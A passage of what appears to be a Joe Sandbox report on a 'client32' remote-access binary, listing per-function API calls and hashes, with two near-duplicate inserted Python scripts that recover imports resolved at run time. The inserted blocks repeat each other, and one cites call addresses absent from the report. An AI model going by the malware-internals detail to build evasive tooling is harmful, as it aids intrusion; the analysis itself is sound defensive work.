                                                                                                                                                    • Associated: 0000000A.00000002.2522008878.00000000111F1000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                    • Associated: 0000000A.00000002.2522116044.00000000111F7000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                    • Associated: 0000000A.00000002.2522116044.000000001120B000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                    • Associated: 0000000A.00000002.2522116044.000000001125D000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                    • Associated: 0000000A.00000002.2522116044.0000000011288000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                    • Associated: 0000000A.00000002.2522116044.000000001129E000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                    • Associated: 0000000A.00000002.2522116044.00000000112AD000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                    • Associated: 0000000A.00000002.2522116044.00000000112B4000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                    • Associated: 0000000A.00000002.2522116044.00000000112DF000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                    • Associated: 0000000A.00000002.2522116044.000000001132B000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                    • Snapshot File: hcaresult_10_2_11000000_client32.jbxd
                                                                                                                                                    Yara matches
                                                                                                                                                    Similarity
                                                                                                                                                    • API ID: Window$Rect$ClientCreateItemLongObjectShowText
                                                                                                                                                    • String ID: ..\ctl32\nsmdlg.cpp$Static$e:\nsmsrc\nsm\1210\1210f\ctl32\wndclass.h$m_eh$m_hWnd
                                                                                                                                                    • API String ID: 4172769820-2231854162
                                                                                                                                                    • Opcode ID: c3b9e28978103be5a937d48a63f04c3ffe11da8c089b37b84e1aa512a40c65d6
                                                                                                                                                    • Instruction ID: 2d84ac58a4c57407e54c3cb5711102d4444eebaf719169cc73b89b5b27c55d8a
                                                                                                                                                    • Opcode Fuzzy Hash: c3b9e28978103be5a937d48a63f04c3ffe11da8c089b37b84e1aa512a40c65d6
                                                                                                                                                    • Instruction Fuzzy Hash: 8F81C375E00716ABD721CF64CC85F9EB3F4BB88B08F0045ADE5569B680EB74A940CF92
                                                                                                                                                    APIs
                                                                                                                                                    • EnterCriticalSection.KERNEL32(0000017D,1EF76653,0000017D,?,?,?,?,?,?,?,?,1118B168,000000FF,?,1110F947,00000001), ref: 1110F427
                                                                                                                                                    • _memset.LIBCMT ref: 1110F4C2
                                                                                                                                                    • SetFilePointer.KERNEL32(?,00000000,00000000,00000001), ref: 1110F4FA
• WriteFile.KERNEL32(?,?,?,?,00000000), ref: 1110F58E
• SetFilePointer.KERNEL32(?,00000000,00000000,00000000), ref: 1110F5B9
• WriteFile.KERNEL32(?,PCIR,00000030,?,00000000), ref: 1110F5CE
  • Part of subcall function 11110000: InterlockedDecrement.KERNEL32(?), ref: 11110008
• CloseHandle.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,?,1118B168,000000FF), ref: 1110F5F5
• _free.LIBCMT ref: 1110F628
• CloseHandle.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,?,?,?,?,?,?), ref: 1110F665
• timeEndPeriod.WINMM(00000001,?,?,?,?,?,?,?,?,?,?,?,?,?,?,?), ref: 1110F677
• LeaveCriticalSection.KERNEL32(0000017D,?,?,?,?,?,?,?,1118B168,000000FF,?,1110F947,00000001,1EF76653,0000017D,00000001), ref: 1110F681
Strings
Memory Dump Source
• Source File: 0000000A.00000002.2510623884.0000000011001000.00000020.00000001.01000000.00000009.sdmp, Offset: 11000000, based on PE: true
• Associated: 0000000A.00000002.2510574022.0000000011000000.00000002.00000001.01000000.00000009.sdmp
• Associated: 0000000A.00000002.2519676466.0000000011194000.00000002.00000001.01000000.00000009.sdmp
• Associated: 0000000A.00000002.2521599534.00000000111E2000.00000004.00000001.01000000.00000009.sdmp
• Associated: 0000000A.00000002.2522008878.00000000111F1000.00000004.00000001.01000000.00000009.sdmp
• Associated: 0000000A.00000002.2522116044.00000000111F7000.00000002.00000001.01000000.00000009.sdmp
• Associated: 0000000A.00000002.2522116044.000000001120B000.00000002.00000001.01000000.00000009.sdmp
• Associated: 0000000A.00000002.2522116044.000000001125D000.00000002.00000001.01000000.00000009.sdmp
• Associated: 0000000A.00000002.2522116044.0000000011288000.00000002.00000001.01000000.00000009.sdmp
• Associated: 0000000A.00000002.2522116044.000000001129E000.00000002.00000001.01000000.00000009.sdmp
• Associated: 0000000A.00000002.2522116044.00000000112AD000.00000002.00000001.01000000.00000009.sdmp
• Associated: 0000000A.00000002.2522116044.00000000112B4000.00000002.00000001.01000000.00000009.sdmp
• Associated: 0000000A.00000002.2522116044.00000000112DF000.00000002.00000001.01000000.00000009.sdmp
• Associated: 0000000A.00000002.2522116044.000000001132B000.00000002.00000001.01000000.00000009.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_10_2_11000000_client32.jbxd
Yara matches
Similarity
• API ID: File$CloseCriticalHandlePointerSectionWrite$DecrementEnterInterlockedLeavePeriod_free_memsettime
• String ID: End Record %s$PCIR
• API String ID: 4278564793-2672865668
• Opcode ID: 2297d0fbe9251eaeeb3cc25f45a368d5b625df3f620643443588fc5d57948bb5
• Instruction ID: c7b3bd1ea8319edfd3cc52dfdc755cda258f2b25611d18eaf89bf58ef2166273
• Opcode Fuzzy Hash: 2297d0fbe9251eaeeb3cc25f45a368d5b625df3f620643443588fc5d57948bb5
• Instruction Fuzzy Hash: 32811875A0070AABD724CFA4C881BEBF7F8FF88704F00492DE66A97240D775A941CB91
APIs
• LoadLibraryA.KERNEL32(Wtsapi32.dll,1EF76653,1102E747,?,00000000), ref: 110F711B
• GetProcAddress.KERNEL32(00000000,WTSQuerySessionInformationA), ref: 110F7179
• wsprintfA.USER32 ref: 110F7235
• SetLastError.KERNEL32(00000078), ref: 110F7242
• wsprintfA.USER32 ref: 110F7267
• GetProcAddress.KERNEL32(?,WTSFreeMemory), ref: 110F72A7
• SetLastError.KERNEL32(00000078), ref: 110F72BC
• FreeLibrary.KERNEL32(?), ref: 110F72D0
Strings
Memory Dump Source
• Source File: 0000000A.00000002.2510623884.0000000011001000.00000020.00000001.01000000.00000009.sdmp, Offset: 11000000, based on PE: true
• Associated: 0000000A.00000002.2510574022.0000000011000000.00000002.00000001.01000000.00000009.sdmp
• Associated: 0000000A.00000002.2519676466.0000000011194000.00000002.00000001.01000000.00000009.sdmp
• Associated: 0000000A.00000002.2521599534.00000000111E2000.00000004.00000001.01000000.00000009.sdmp
• Associated: 0000000A.00000002.2522008878.00000000111F1000.00000004.00000001.01000000.00000009.sdmp
• Associated: 0000000A.00000002.2522116044.00000000111F7000.00000002.00000001.01000000.00000009.sdmp
• Associated: 0000000A.00000002.2522116044.000000001120B000.00000002.00000001.01000000.00000009.sdmp
• Associated: 0000000A.00000002.2522116044.000000001125D000.00000002.00000001.01000000.00000009.sdmp
• Associated: 0000000A.00000002.2522116044.0000000011288000.00000002.00000001.01000000.00000009.sdmp
• Associated: 0000000A.00000002.2522116044.000000001129E000.00000002.00000001.01000000.00000009.sdmp
• Associated: 0000000A.00000002.2522116044.00000000112AD000.00000002.00000001.01000000.00000009.sdmp
• Associated: 0000000A.00000002.2522116044.00000000112B4000.00000002.00000001.01000000.00000009.sdmp
• Associated: 0000000A.00000002.2522116044.00000000112DF000.00000002.00000001.01000000.00000009.sdmp
• Associated: 0000000A.00000002.2522116044.000000001132B000.00000002.00000001.01000000.00000009.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_10_2_11000000_client32.jbxd
Yara matches
Similarity
• API ID: AddressErrorLastLibraryProcwsprintf$FreeLoad
• String ID: %u.%u.%u.%u$%x:%x:%x:%x:%x:%x:%x:%x$WTSFreeMemory$WTSQuerySessionInformationA$Wtsapi32.dll
• API String ID: 856016564-3838485836
• Opcode ID: cc029828f1d21abf9f8ceca98a157caf4b608a284bbec4fbfb4073d9588458f4
• Instruction ID: 25a542e7ca9f20ccb9d734b321771151ba7e8120a74b68384c663ef2db5eebf1
• Opcode Fuzzy Hash: cc029828f1d21abf9f8ceca98a157caf4b608a284bbec4fbfb4073d9588458f4
• Instruction Fuzzy Hash: 2161B771D042689FDB18CFA98C98AADFFF5BF49301F0581AEF16A97251D6345904CF20
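The LoadLibraryA/GetProcAddress sequences in the Wtsapi32.dll block above and in the ws2_32.dll block of this report are the client resolving imports at run time, which keeps those names out of the PE import table and out of a naive static-import triage. The Python below is an added example, not part of the Joe Sandbox report or of the NetSupport client: it parses function blocks in this report's plain-text layout and lists, per loaded DLL, the procedures each block resolved. The sample text is constructed from the report's own API lines, and treating `?` and bare 8-digit hex as "argument unknown" is an assumption about the report format.

```python
"""Extract run-time resolved imports (LoadLibrary* followed by GetProcAddress)
from the per-function API listings of a Joe Sandbox report excerpt."""
import re

# One API line of the report looks like (constructed from the report's lines):
#   • LoadLibraryA.KERNEL32(Wtsapi32.dll,1EF76653,1102E747,?,00000000), ref: 110F711B
#   • wsprintfA.USER32 ref: 110F7235            (no argument list)
#   • Part of subcall function 11110000: InterlockedDecrement.KERNEL32(?), ref: 11110008
API_LINE = re.compile(
    r"^\s*[•*-]\s*"
    r"(?:Part of subcall function\s+(?P<sub>[0-9A-Fa-f]+):\s*)?"
    r"(?P<api>[A-Za-z_][\w@]*)\.(?P<module>[A-Za-z0-9_]+)"
    r"(?:\((?P<args>[^)]*)\))?"
    r"(?:\s*,?\s*ref:\s*(?P<ref>[0-9A-Fa-f]+))?"
)

LOADERS = {"LoadLibraryA", "LoadLibraryW", "LoadLibraryExA", "LoadLibraryExW",
           "GetModuleHandleA", "GetModuleHandleW"}


def parse_api_calls(text):
    """Return a list of blocks; each block is the list of API calls (dicts)
    listed under one 'APIs' header, in report order."""
    blocks, current = [], []
    in_apis = True  # True so an excerpt that starts mid-block is still parsed
    for line in text.splitlines():
        stripped = line.strip()
        if stripped == "APIs":
            if current:
                blocks.append(current)
            current, in_apis = [], True
            continue
        if stripped in ("Strings", "Memory Dump Source"):
            in_apis = False  # the rest of the block is metadata, not calls
            continue
        m = API_LINE.match(line) if in_apis else None
        if m:
            args = m.group("args")
            current.append({
                "api": m.group("api"),
                "module": m.group("module"),
                "args": [a.strip() for a in args.split(",")] if args else [],
                "ref": m.group("ref"),
                "subcall": m.group("sub"),
            })
    if current:
        blocks.append(current)
    return blocks


def _is_name(arg):
    # Assumption: the report prints unknown arguments as "?" or as 8 hex digits,
    # so anything else in a string-typed slot is a real DLL or export name.
    return arg not in ("", "?") and not re.fullmatch(r"-?[0-9A-Fa-f]{8}", arg)


def dynamic_imports(text):
    """Map each DLL named in a LoadLibrary* call to the exports that later
    GetProcAddress calls in the same block resolved from it."""
    resolved = {}
    for calls in parse_api_calls(text):
        lib = "<unknown module>"  # GetProcAddress before any LoadLibrary* in the block
        for call in calls:
            if call["api"] in LOADERS and call["args"] and _is_name(call["args"][0]):
                lib = call["args"][0]
            elif call["api"] == "GetProcAddress":
                # GetProcAddress(hModule, lpProcName): the export name is argument 2
                proc = call["args"][1] if len(call["args"]) > 1 else "?"
                if not _is_name(proc):
                    proc = "?"
                procs = resolved.setdefault(lib, [])
                if proc not in procs:
                    procs.append(proc)
    return resolved


# Constructed sample: two function blocks copied from the report's API lines.
SAMPLE_REPORT = """\
APIs
• LoadLibraryA.KERNEL32(Wtsapi32.dll,1EF76653,1102E747,?,00000000), ref: 110F711B
• GetProcAddress.KERNEL32(00000000,WTSQuerySessionInformationA), ref: 110F7179
• wsprintfA.USER32 ref: 110F7235
• SetLastError.KERNEL32(00000078), ref: 110F7242
• GetProcAddress.KERNEL32(?,WTSFreeMemory), ref: 110F72A7
• FreeLibrary.KERNEL32(?), ref: 110F72D0
Strings
Memory Dump Source
• Source File: 0000000A.00000002.2510623884.0000000011001000.00000020.00000001.01000000.00000009.sdmp, Offset: 11000000, based on PE: true
Similarity
• API ID: AddressErrorLastLibraryProcwsprintf$FreeLoad
APIs
• LoadLibraryA.KERNEL32(ws2_32.dll,00000000,?), ref: 1112B9E6
• GetProcAddress.KERNEL32(00000000,WSAStartup), ref: 1112BA03
• GetProcAddress.KERNEL32(00000000,WSACleanup), ref: 1112BA0D
• GetProcAddress.KERNEL32(00000000,socket), ref: 1112BA1B
• GetProcAddress.KERNEL32(00000000,closesocket), ref: 1112BA29
• GetProcAddress.KERNEL32(00000000,WSAIoctl), ref: 1112BA37
• FreeLibrary.KERNEL32(00000000), ref: 1112BAAC
Strings
"""

if __name__ == "__main__":
    for lib, procs in dynamic_imports(SAMPLE_REPORT).items():
        print(f"{lib}: {', '.join(procs)}")
```

Run against the full report text rather than the constructed sample, the output is a per-DLL list of run-time resolved exports that can be compared with the static import table to see which capabilities (here: session client-address lookup via WTS, raw Winsock access via WSAIoctl) the client only reveals dynamically.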
APIs
• SendMessageA.USER32(?,0000000E,00000000,00000000), ref: 11025036
• SendMessageA.USER32(?,000000BA,00000000,00000000), ref: 11025049
• SendMessageA.USER32(?,000000BB,-00000001,00000000), ref: 1102505A
• SendMessageA.USER32(?,000000C1,00000000,00000000), ref: 11025065
• SendMessageA.USER32(?,000000C4,-00000001,?), ref: 1102507E
• GetDC.USER32(?), ref: 11025085
• SendMessageA.USER32(?,00000031,00000000,00000000), ref: 11025095
• SelectObject.GDI32(?,00000000), ref: 110250A2
• GetTextExtentPoint32A.GDI32(?,00000020,00000001,?), ref: 110250B8
• SelectObject.GDI32(?,?), ref: 110250C7
• ReleaseDC.USER32(?,?), ref: 110250CF
• SetCaretPos.USER32(?,?), ref: 11025111
Strings
Memory Dump Source
• Source File: 0000000A.00000002.2510623884.0000000011001000.00000020.00000001.01000000.00000009.sdmp, Offset: 11000000, based on PE: true
• Associated: 0000000A.00000002.2510574022.0000000011000000.00000002.00000001.01000000.00000009.sdmp
• Associated: 0000000A.00000002.2519676466.0000000011194000.00000002.00000001.01000000.00000009.sdmp
• Associated: 0000000A.00000002.2521599534.00000000111E2000.00000004.00000001.01000000.00000009.sdmp
• Associated: 0000000A.00000002.2522008878.00000000111F1000.00000004.00000001.01000000.00000009.sdmp
• Associated: 0000000A.00000002.2522116044.00000000111F7000.00000002.00000001.01000000.00000009.sdmp
• Associated: 0000000A.00000002.2522116044.000000001120B000.00000002.00000001.01000000.00000009.sdmp
• Associated: 0000000A.00000002.2522116044.000000001125D000.00000002.00000001.01000000.00000009.sdmp
• Associated: 0000000A.00000002.2522116044.0000000011288000.00000002.00000001.01000000.00000009.sdmp
• Associated: 0000000A.00000002.2522116044.000000001129E000.00000002.00000001.01000000.00000009.sdmp
• Associated: 0000000A.00000002.2522116044.00000000112AD000.00000002.00000001.01000000.00000009.sdmp
• Associated: 0000000A.00000002.2522116044.00000000112B4000.00000002.00000001.01000000.00000009.sdmp
• Associated: 0000000A.00000002.2522116044.00000000112DF000.00000002.00000001.01000000.00000009.sdmp
• Associated: 0000000A.00000002.2522116044.000000001132B000.00000002.00000001.01000000.00000009.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_10_2_11000000_client32.jbxd
Yara matches
Similarity
• API ID: MessageSend$ObjectSelect$CaretExtentPoint32ReleaseText
• String ID:
• API String ID: 4100900918-3916222277
• Opcode ID: 81849d76d252f21a55fd605d5a4a08d2267cf51cac1b4e435e9d7ec204cef2ae
• Instruction ID: b0707e50622e5a2dee3f64ca7938c426cfa52823b6f102614556d1b444951bd6
• Opcode Fuzzy Hash: 81849d76d252f21a55fd605d5a4a08d2267cf51cac1b4e435e9d7ec204cef2ae
• Instruction Fuzzy Hash: 84414C71A41318AFEB10DFA4CD84FAEBBF8EF89700F118169F915AB244DB749900CB60
APIs
• _memset.LIBCMT ref: 1101F0FE
• SystemParametersInfoA.USER32(00000029,00000000,?,00000000), ref: 1101F11D
  • Part of subcall function 110CCE60: GetWindowRect.USER32(110CEFF5,?), ref: 110CCE7C
  • Part of subcall function 110CCE60: SetRectEmpty.USER32(?), ref: 110CCE88
• DeleteObject.GDI32(00000000), ref: 1101F16C
• DeleteObject.GDI32(00000000), ref: 1101F178
• CreateFontIndirectA.GDI32(?), ref: 1101F187
• CreateFontIndirectA.GDI32(?), ref: 1101F19F
• GetMenuItemCount.USER32 ref: 1101F1A7
• _memset.LIBCMT ref: 1101F1CF
• GetMenuItemInfoA.USER32(?,00000000,00000001,?), ref: 1101F20C
• __strdup.LIBCMT ref: 1101F221
• SetMenuItemInfoA.USER32(?,00000000,00000001,00000030), ref: 1101F279
Strings
Memory Dump Source
• Source File: 0000000A.00000002.2510623884.0000000011001000.00000020.00000001.01000000.00000009.sdmp, Offset: 11000000, based on PE: true
• Associated: 0000000A.00000002.2510574022.0000000011000000.00000002.00000001.01000000.00000009.sdmp
• Associated: 0000000A.00000002.2519676466.0000000011194000.00000002.00000001.01000000.00000009.sdmp
• Associated: 0000000A.00000002.2521599534.00000000111E2000.00000004.00000001.01000000.00000009.sdmp
• Associated: 0000000A.00000002.2522008878.00000000111F1000.00000004.00000001.01000000.00000009.sdmp
• Associated: 0000000A.00000002.2522116044.00000000111F7000.00000002.00000001.01000000.00000009.sdmp
• Associated: 0000000A.00000002.2522116044.000000001120B000.00000002.00000001.01000000.00000009.sdmp
• Associated: 0000000A.00000002.2522116044.000000001125D000.00000002.00000001.01000000.00000009.sdmp
• Associated: 0000000A.00000002.2522116044.0000000011288000.00000002.00000001.01000000.00000009.sdmp
• Associated: 0000000A.00000002.2522116044.000000001129E000.00000002.00000001.01000000.00000009.sdmp
• Associated: 0000000A.00000002.2522116044.00000000112AD000.00000002.00000001.01000000.00000009.sdmp
• Associated: 0000000A.00000002.2522116044.00000000112B4000.00000002.00000001.01000000.00000009.sdmp
• Associated: 0000000A.00000002.2522116044.00000000112DF000.00000002.00000001.01000000.00000009.sdmp
• Associated: 0000000A.00000002.2522116044.000000001132B000.00000002.00000001.01000000.00000009.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_10_2_11000000_client32.jbxd
Yara matches
Similarity
• API ID: InfoItemMenu$CreateDeleteFontIndirectObjectRect_memset$CountEmptyParametersSystemWindow__strdup
• String ID: 0$MakeOwnerDraw
• API String ID: 1249465458-1190305232
• Opcode ID: c1d057d4b376d33391db275f0bf70fb86bac35c6ea87d071bec4acea8677cd57
• Instruction ID: cad075490b8b101532292c9a84c7126ab9bfd0db94d612dc2b0baac2de7b47d0
• Opcode Fuzzy Hash: c1d057d4b376d33391db275f0bf70fb86bac35c6ea87d071bec4acea8677cd57
• Instruction Fuzzy Hash: 19417E71D012399BDB64DFA4CC89BD9FBB8BB09708F0001D9E508A7284DBB46A84CF94
APIs
• LoadLibraryA.KERNEL32(ws2_32.dll,00000000,?), ref: 1112B9E6
• GetProcAddress.KERNEL32(00000000,WSAStartup), ref: 1112BA03
• GetProcAddress.KERNEL32(00000000,WSACleanup), ref: 1112BA0D
• GetProcAddress.KERNEL32(00000000,socket), ref: 1112BA1B
• GetProcAddress.KERNEL32(00000000,closesocket), ref: 1112BA29
• GetProcAddress.KERNEL32(00000000,WSAIoctl), ref: 1112BA37
• FreeLibrary.KERNEL32(00000000), ref: 1112BAAC
Memory Dump Source
• Source File: 0000000A.00000002.2510623884.0000000011001000.00000020.00000001.01000000.00000009.sdmp, Offset: 11000000, based on PE: true
• Associated: 0000000A.00000002.2510574022.0000000011000000.00000002.00000001.01000000.00000009.sdmp
• Associated: 0000000A.00000002.2519676466.0000000011194000.00000002.00000001.01000000.00000009.sdmp
• Associated: 0000000A.00000002.2521599534.00000000111E2000.00000004.00000001.01000000.00000009.sdmp
• Associated: 0000000A.00000002.2522008878.00000000111F1000.00000004.00000001.01000000.00000009.sdmp
• Associated: 0000000A.00000002.2522116044.00000000111F7000.00000002.00000001.01000000.00000009.sdmp
• Associated: 0000000A.00000002.2522116044.000000001120B000.00000002.00000001.01000000.00000009.sdmp
• Associated: 0000000A.00000002.2522116044.000000001125D000.00000002.00000001.01000000.00000009.sdmp
• Associated: 0000000A.00000002.2522116044.0000000011288000.00000002.00000001.01000000.00000009.sdmp
• Associated: 0000000A.00000002.2522116044.000000001129E000.00000002.00000001.01000000.00000009.sdmp
• Associated: 0000000A.00000002.2522116044.00000000112AD000.00000002.00000001.01000000.00000009.sdmp
• Associated: 0000000A.00000002.2522116044.00000000112B4000.00000002.00000001.01000000.00000009.sdmp
• Associated: 0000000A.00000002.2522116044.00000000112DF000.00000002.00000001.01000000.00000009.sdmp
• Associated: 0000000A.00000002.2522116044.000000001132B000.00000002.00000001.01000000.00000009.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_10_2_11000000_client32.jbxd
• API ID: AddressProc$Library$FreeLoad
• String ID: WSACleanup$WSAIoctl$WSAStartup$closesocket$socket$ws2_32.dll
• API String ID: 2449869053-2279908372
• Opcode ID: cea9448887420246af282f77f4e5a4ecce69bf7a034b252f213f846cda0e5cbe
• Instruction ID: 1bba0573f20789ca060975004b1edadb32616992e73bf794dbb13e42fcf3a639
• Opcode Fuzzy Hash: cea9448887420246af282f77f4e5a4ecce69bf7a034b252f213f846cda0e5cbe
• Instruction Fuzzy Hash: 5231B371B11228ABEB249F758C55FEEF7B8EF8A315F104199FA09A7280DA705D408F94
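The function above resolves its Winsock imports at run time (LoadLibraryA on ws2_32.dll, then GetProcAddress for WSAStartup, WSACleanup, socket, closesocket and WSAIoctl), and a later entry on this page does the same for Wtsapi32.dll (WTSQuerySessionInformationA, WTSFreeMemory). None of those names therefore show up in the PE import table; in this report they surface only as arguments in the APIs listing and in the String ID line. The following is an added example, not Joe Sandbox code: a parser for the report's "API.MODULE(args), ref: ADDR" call lines that pairs each GetProcAddress with the library loaded by the preceding LoadLibraryA, so the hidden import set can be read off directly. It assumes the argument order the report prints (library name first for LoadLibraryA, export name second for GetProcAddress); the sample input is the call lines copied from this page.

```python
"""Reconstruct run-time resolved imports from Joe Sandbox 'APIs' listings.

Added example, not part of the Joe Sandbox report or the NetSupport client.
It parses the call lines printed under each analysed function
("API.MODULE(args), ref: ADDR") and attributes every GetProcAddress to the
library loaded by the most recent LoadLibraryA, until FreeLibrary closes it.
"""
import re

# Constructed sample: the call lines from the ws2_32 and Wtsapi32 function
# entries in this report, plus one "Part of subcall" line without parentheses.
SAMPLE = """
• LoadLibraryA.KERNEL32(ws2_32.dll,00000000,?), ref: 1112B9E6
• GetProcAddress.KERNEL32(00000000,WSAStartup), ref: 1112BA03
• GetProcAddress.KERNEL32(00000000,WSACleanup), ref: 1112BA0D
• GetProcAddress.KERNEL32(00000000,socket), ref: 1112BA1B
• GetProcAddress.KERNEL32(00000000,closesocket), ref: 1112BA29
• GetProcAddress.KERNEL32(00000000,WSAIoctl), ref: 1112BA37
• FreeLibrary.KERNEL32(00000000), ref: 1112BAAC
• LoadLibraryA.KERNEL32(Wtsapi32.dll,1EF76653,1102E747,?,00000000,?,?,?,?,?,?,?,?,?,?,00000000), ref: 110F732D
• GetProcAddress.KERNEL32(00000000,WTSQuerySessionInformationA), ref: 110F7372
• GetProcAddress.KERNEL32(?,WTSFreeMemory), ref: 110F73C3
• SetLastError.KERNEL32(00000078,?,?,?,?,?,?,?,?,?,?,00000000,11189DD0,000000FF,?,1102A280), ref: 110F73D8
• GetProcAddress.KERNEL32(?,WTSFreeMemory), ref: 110F73FD
• SetLastError.KERNEL32(00000078,?,?,?,?,?,?,?,?,?,?,?,?,00000000,11189DD0,000000FF), ref: 110F7412
• FreeLibrary.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,?,00000000,11189DD0,000000FF), ref: 110F7423
• SetLastError.KERNEL32(00000078,?,?,?,?,?,?,?,?,?,?,00000000,11189DD0,000000FF,?,1102A280), ref: 110F7440
• FreeLibrary.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,00000000,11189DD0,000000FF,?,1102A280), ref: 110F7451
  • Part of subcall function 11029A70: wsprintfA.USER32 ref: 11029AD7
"""

# One call line: optional subcall prefix, API.MODULE, optional (args), ref: hex address.
CALL_RE = re.compile(
    r"(?:Part of subcall function (?P<caller>[0-9A-Fa-f]+):\s*)?"
    r"(?P<api>\w+)\.(?P<module>\w+)"
    r"(?:\((?P<args>.*?)\))?,?\s*ref:\s*(?P<ref>[0-9A-Fa-f]+)"
)


def parse_calls(text):
    """Turn each call line into a dict; lines that are not call entries are skipped."""
    calls = []
    for line in text.splitlines():
        m = CALL_RE.search(line)
        if not m:
            continue
        args = m.group("args")
        calls.append({
            "api": m.group("api"),
            "module": m.group("module"),
            "args": [a.strip() for a in args.split(",")] if args is not None else [],
            "ref": int(m.group("ref"), 16),
            "subcall": m.group("caller"),  # None when the call is in the function itself
        })
    return calls


def dynamic_imports(text):
    """Map each LoadLibraryA target to the export names resolved from it.

    Assumed argument order (as the report prints it): LoadLibraryA's first
    argument is the library, GetProcAddress's second is the export name.
    Repeated lookups of the same name (WTSFreeMemory here) are collapsed.
    """
    imports = {}
    current = None
    for call in parse_calls(text):
        if call["api"] in ("LoadLibraryA", "LoadLibraryW") and call["args"]:
            current = call["args"][0]
            imports.setdefault(current, [])
        elif call["api"] == "GetProcAddress" and current and len(call["args"]) >= 2:
            name = call["args"][1]
            if name not in imports[current]:
                imports[current].append(name)
        elif call["api"] == "FreeLibrary":
            current = None  # handle released; later lookups belong to another load
    return imports


if __name__ == "__main__":
    for lib, names in dynamic_imports(SAMPLE).items():
        print(f"{lib}: {', '.join(names)}")
```

The recovered set (ws2_32.dll: WSAStartup, WSACleanup, socket, closesocket, WSAIoctl; Wtsapi32.dll: WTSQuerySessionInformationA, WTSFreeMemory) is what an import-table check misses, which is why string-level hunting on these names, as the report's String ID line already does, is the more robust pivot for this sample.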
APIs
  • Part of subcall function 1115BAE0: IsIconic.USER32(?), ref: 1115BB87
  • Part of subcall function 1115BAE0: ShowWindow.USER32(?,00000009), ref: 1115BB97
  • Part of subcall function 1115BAE0: BringWindowToTop.USER32(?), ref: 1115BBA1
• CheckMenuItem.USER32(00000000,000013EB,-00000009), ref: 1102384D
• ShowWindow.USER32(?,00000003), ref: 110238D1
• LoadMenuA.USER32(00000000,000013A3), ref: 110239FB
• GetSubMenu.USER32(00000000,00000000), ref: 11023A09
• CheckMenuItem.USER32(00000000,000013EB,?), ref: 11023A29
• GetDlgItem.USER32(?,000013B2), ref: 11023A3C
• GetWindowRect.USER32(00000000), ref: 11023A43
• PostMessageA.USER32(?,00000111,?,00000000), ref: 11023A99
• DestroyMenu.USER32(?,?,00000000,00000000,00000102,?,?,?,00000000), ref: 11023AA3
Memory Dump Source
• Source File: 0000000A.00000002.2510623884.0000000011001000.00000020.00000001.01000000.00000009.sdmp, Offset: 11000000, based on PE: true
• Associated: 0000000A.00000002.2510574022.0000000011000000.00000002.00000001.01000000.00000009.sdmp
• Associated: 0000000A.00000002.2519676466.0000000011194000.00000002.00000001.01000000.00000009.sdmp
• Associated: 0000000A.00000002.2521599534.00000000111E2000.00000004.00000001.01000000.00000009.sdmp
• Associated: 0000000A.00000002.2522008878.00000000111F1000.00000004.00000001.01000000.00000009.sdmp
• Associated: 0000000A.00000002.2522116044.00000000111F7000.00000002.00000001.01000000.00000009.sdmp
• Associated: 0000000A.00000002.2522116044.000000001120B000.00000002.00000001.01000000.00000009.sdmp
• Associated: 0000000A.00000002.2522116044.000000001125D000.00000002.00000001.01000000.00000009.sdmp
• Associated: 0000000A.00000002.2522116044.0000000011288000.00000002.00000001.01000000.00000009.sdmp
• Associated: 0000000A.00000002.2522116044.000000001129E000.00000002.00000001.01000000.00000009.sdmp
• Associated: 0000000A.00000002.2522116044.00000000112AD000.00000002.00000001.01000000.00000009.sdmp
• Associated: 0000000A.00000002.2522116044.00000000112B4000.00000002.00000001.01000000.00000009.sdmp
• Associated: 0000000A.00000002.2522116044.00000000112DF000.00000002.00000001.01000000.00000009.sdmp
• Associated: 0000000A.00000002.2522116044.000000001132B000.00000002.00000001.01000000.00000009.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_10_2_11000000_client32.jbxd
• API ID: Menu$Window$Item$CheckShow$BringDestroyIconicLoadMessagePostRect
• String ID: AddToJournal$Chat
• API String ID: 693070851-2976406578
• Opcode ID: 4e8affa197535ad0660103244a90f227890d3a0ada2779ccdef05f8d718aa204
• Instruction ID: 808c1e48a155f27d2b3c0586fadc3707d2cf985dccefb9094def5a9ab05a8e38
• Opcode Fuzzy Hash: 4e8affa197535ad0660103244a90f227890d3a0ada2779ccdef05f8d718aa204
• Instruction Fuzzy Hash: 58A10334F44616ABDB08CF64CC85FAEB3E9AB8C704F50452DE6569F6C0DBB4A900CB95
APIs
  • Part of subcall function 110D0960: __strdup.LIBCMT ref: 110D097A
  • Part of subcall function 110D0A10: _free.LIBCMT ref: 110D0A3D
  • Part of subcall function 110D15C0: wvsprintfA.USER32(?,?,1102CC61), ref: 110D15EB
  • Part of subcall function 11029A70: GetLastError.KERNEL32(?,00000000,?), ref: 11029A8C
  • Part of subcall function 11029A70: wsprintfA.USER32 ref: 11029AD7
  • Part of subcall function 11029A70: MessageBoxA.USER32(00000000,?,Client32,00000000), ref: 11029B13
  • Part of subcall function 11029A70: ExitProcess.KERNEL32 ref: 11029B29
• GetLocalTime.KERNEL32(?), ref: 110A1778
Memory Dump Source
• Source File: 0000000A.00000002.2510623884.0000000011001000.00000020.00000001.01000000.00000009.sdmp, Offset: 11000000, based on PE: true
• Associated: 0000000A.00000002.2510574022.0000000011000000.00000002.00000001.01000000.00000009.sdmp
• Associated: 0000000A.00000002.2519676466.0000000011194000.00000002.00000001.01000000.00000009.sdmp
• Associated: 0000000A.00000002.2521599534.00000000111E2000.00000004.00000001.01000000.00000009.sdmp
